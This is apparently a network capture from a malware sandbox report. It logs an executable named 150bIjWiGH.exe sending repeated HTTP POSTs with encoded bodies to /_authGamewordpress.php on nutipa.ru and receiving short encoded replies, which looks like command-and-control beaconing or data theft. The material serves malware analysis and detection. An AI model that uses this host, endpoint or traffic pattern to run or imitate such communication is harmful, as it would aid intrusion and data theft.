                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LIk8IUKQzskfwJieMrGcRZQfpMB1Gd2uqk0bIMCHT9hHEGkwpfkqmodDrgZyL0JFQlCS%2FVu1PQhoolkSJ2lVSN568HDDU4gu5Yt6yPa0y7MdNXiCKa1VFyjsNgQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b030dabde95-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4699&min_rtt=1608&rtt_var=6785&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=55431&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.449780104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:07.035840988 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:07.388855934 CET2536OUTData Raw: 55 53 43 5a 5f 56 58 51 5d 5a 56 51 50 59 57 52 55 54 5e 40 5a 51 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USCZ_VXQ]ZVQPYWRUT^@ZQ[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'(>1?9'#<6)=+Y47&>*Y%%=3?X$X>+U%U/;.F'#P #
                                                            Dec 15, 2024 19:37:08.129970074 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:08.373287916 CET785INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AvpWBttvX0o4rgUSqYpogCnG6FQiRtZ4aA2joR5eyGVdicLA6kRhyHMtiv58uG9gX2FoxA1G76Swl78bDBFHelIon2O92gpyCJcn2PJEHwsFm%2FBrw05QrYeHlEY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b0cdf5ff795-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4959&min_rtt=1870&rtt_var=6880&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=54916&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a
                                                            Data Ascii: 44W@T
                                                            Dec 15, 2024 19:37:08.565452099 CET5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.449782104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:08.803869963 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:09.154298067 CET2536OUTData Raw: 50 5f 46 5f 5f 59 58 56 5d 5a 56 51 50 50 57 5b 55 53 5e 47 5a 5f 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: P_F__YXV]ZVQPPW[US^GZ_[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\?">:6:D)-$#Z'.)12=0<3=<0!/.F'#P
                                                            Dec 15, 2024 19:37:09.890419960 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:10.145395994 CET802INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UQS30vOt6TniuStzuE%2Fg%2BkvXTF62YXrge9OQ8OpHAgtFNAXrreKuk4ftMYHdU%2BL9Q2AaGbI%2BvgtDNdqqdpJm9XCG3FxNLa%2B0Fin1H%2FwFZU6Rx%2FmxE0JXdUWNX5g%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b17df150cbe-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3434&min_rtt=1559&rtt_var=4336&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=88137&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            36192.168.2.449788104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:10.392422915 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            37192.168.2.449789104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:10.662281036 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:11.013825893 CET2536OUTData Raw: 50 52 43 5b 5a 5c 58 55 5d 5a 56 51 50 5d 57 5b 55 5d 5e 40 5a 50 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PRC[Z\XU]ZVQP]W[U]^@ZP[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+!)\<6+8!/%>1'->>333X:]+=T,.F'#P 3
                                                            Dec 15, 2024 19:37:11.748574018 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:12.029824972 CET802INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9wcXn8mLaw0%2BjwKh0M%2FUhoxrUwJI9uQ00eV%2BxaUVt0ymZST6O1Nd9NOaXXJ%2FsQxEe%2BUQP%2BzvrZPBNqDcWt2WVn%2B4DdLhhthMLBlqLpMdbQhxCZbaF00P5WaG5mg%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b237d847c7b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4207&min_rtt=2198&rtt_var=4842&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=79903&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            38192.168.2.449790104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:11.312897921 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1392
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:11.669907093 CET1392OUTData Raw: 55 53 46 5b 5a 5d 58 5f 5d 5a 56 51 50 5f 57 5a 55 51 5e 42 5a 53 5b 59 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USF[Z]X_]ZVQP_WZUQ^BZS[Y\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+)=9;]6:E<=$7??12]&-9T><'X&^? ),;.F'#P
                                                            Dec 15, 2024 19:37:12.400815010 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:12.648510933 CET943INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:12 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z3R5X1xGLj%2BqMHSdHSD5IxDXUHp7If0YqJalPUX40fXqAORfh%2FMSvGklUc8fU2JVcz8Jhmyk2arS8alfO5AkRhNpT%2BQxLJvDztFVA2vedjQKIciio8Hl6smPYhc%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b278eb6c33c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4292&min_rtt=1713&rtt_var=5801&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1688&delivery_rate=65327&cwnd=143&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 5d 22 2a 25 0b 21 3d 37 0c 2e 3c 3e 09 28 23 3f 18 27 0c 0f 58 33 38 24 01 29 2d 2b 57 25 00 3e 06 34 1c 25 57 2b 27 07 12 31 36 21 51 03 11 22 5f 31 00 01 00 2b 3a 33 02 25 31 3f 5f 25 2e 3f 07 2b 3b 32 55 27 16 09 1d 34 00 28 1a 2d 04 20 12 3c 29 2b 17 3a 2e 26 57 20 36 2e 53 0c 17 26 00 28 17 2e 58 23 21 36 08 27 5a 27 56 34 2a 2e 52 2a 30 34 1d 27 23 23 56 26 2d 3c 1a 35 30 0b 57 25 14 0c 10 37 32 00 13 3d 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989]"*%!=7.<>(#?'X38$)-+W%>4%W+'16!Q"_1+:3%1?_%.?+;2U'4(- <)+:.&W 6.S&(.X#!6'Z'V4*.R*04'##V&-<50W%72="%\ .R4]T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            39192.168.2.449796104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:12.272524118 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:12.623008013 CET2536OUTData Raw: 50 5f 43 5d 5a 5c 58 51 5d 5a 56 51 50 51 57 55 55 55 5e 40 5a 51 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: P_C]Z\XQ]ZVQPQWUUU^@ZQ[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$[<>.X):\",6+(#'%11>) ;X'*\<=S8;.F'#P
                                                            Dec 15, 2024 19:37:13.359605074 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:13.618988991 CET794INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SRBhTz54%2Bp%2BBmFdDL3DvJtWtDLwWN2iuSXKayEgBZtNiabGKRhaeJV2XNOMPGUhGqYAG%2FxJr5t1b8kjaXMot5m6O9hPM8D9zamvdfRbXQYF8t5oQLgu1KSmSS68%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b2d88605e60-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4046&min_rtt=2192&rtt_var=4531&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=85736&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            40192.168.2.449797104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:13.868746042 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:14.216994047 CET2536OUTData Raw: 55 53 43 58 5a 5c 58 5e 5d 5a 56 51 50 59 57 51 55 57 5e 48 5a 56 5b 59 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: USCXZ\X^]ZVQPYWQUW^HZV[Y\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$_+-^>:56A+>+Z!,;%.-1P>#Z%>:X(0&/;.F'#P #
                                                            Dec 15, 2024 19:37:14.956434965 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:15.213340044 CET797INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:15 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N5SnANsmVKGsqebKjzMeh8OZsJM55kXpuRjz3ECxOoPJTyUAIyVrD3N8qBYC%2BzskHpkE3fpTqrG%2FVTOMYmtmWE4nYj6V5A5oF%2BnKMsOzI688A6o0t8D7hmz%2BwfA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b378df07d1c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3373&min_rtt=1954&rtt_var=3571&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=109700&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            41192.168.2.449805104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:15.459558010 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:15.810451031 CET2536OUTData Raw: 50 5f 43 5b 5f 56 58 51 5d 5a 56 51 50 5e 57 56 55 5c 5e 42 5a 56 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: P_C[_VXQ]ZVQP^WVU\^BZV[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\+.>)\8!!?;!/<Z%X&]%!)#^$-&_?U9W,+.F'#P ?
                                                            Dec 15, 2024 19:37:16.574862003 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:16.822527885 CET790INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vGKLg73rRG%2Br2eYRcsPegzZg0wxAR1jiOUnJaK156llHQOBCP9XHhRLllz0HvjbwXRYCPUURdUVQXznihk3qn0jiW0LV3W0wVIm11nKWXKRiXHIxSI0ihrYPIZs%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b41a8275e64-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4017&min_rtt=1733&rtt_var=5218&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=72981&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            42192.168.2.449806104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:17.208121061 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:17.560520887 CET2536OUTData Raw: 55 50 46 5c 5a 5c 58 50 5d 5a 56 51 50 5b 57 5a 55 53 5e 41 5a 55 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UPF\Z\XP]ZVQP[WZUS^AZU[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$])=?*#"A+37<<\%:Y1W)#$3X== )U/;.F'#P +
                                                            Dec 15, 2024 19:37:18.294855118 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:18.565634966 CET796INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9xChwxRILU1Tvcx1euuEaT8E1qVpqkkRnLMPV%2FftGcdyB2al7CpzfdTeqWJ5J16%2FpztPbhyEAwWLMWojl7PqKVfYtR5Sa%2F3IGhRANnF0ShI3Gq4y1ASYJP8%2FV4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b4c6e764205-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3834&min_rtt=1714&rtt_var=4883&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=78171&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            43192.168.2.449807104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:17.775669098 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:18.123042107 CET1420OUTData Raw: 55 52 43 5d 5f 5e 58 54 5d 5a 56 51 50 5a 57 52 55 5c 5e 40 5a 52 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: URC]_^XT]ZVQPZWRU\^@ZR[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]([):7"*<7!?8X2-"&>* <0:X(#68+.F'#P /
                                                            Dec 15, 2024 19:37:18.885478973 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:19.129477978 CET939INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XRwDmc3BYJMGCP%2FU4v3r8wNLgqh8pgCizmsZxmb7n9MRp1njCrnydyjXHVLL59imWNrYGPEAS4y9F0AO%2B3gC1XriSRe76QmeMnIniA%2BSnIycwiBZQtD2Aw5wONY%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b500e5a0f68-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=9964&min_rtt=5434&rtt_var=11098&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=35030&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
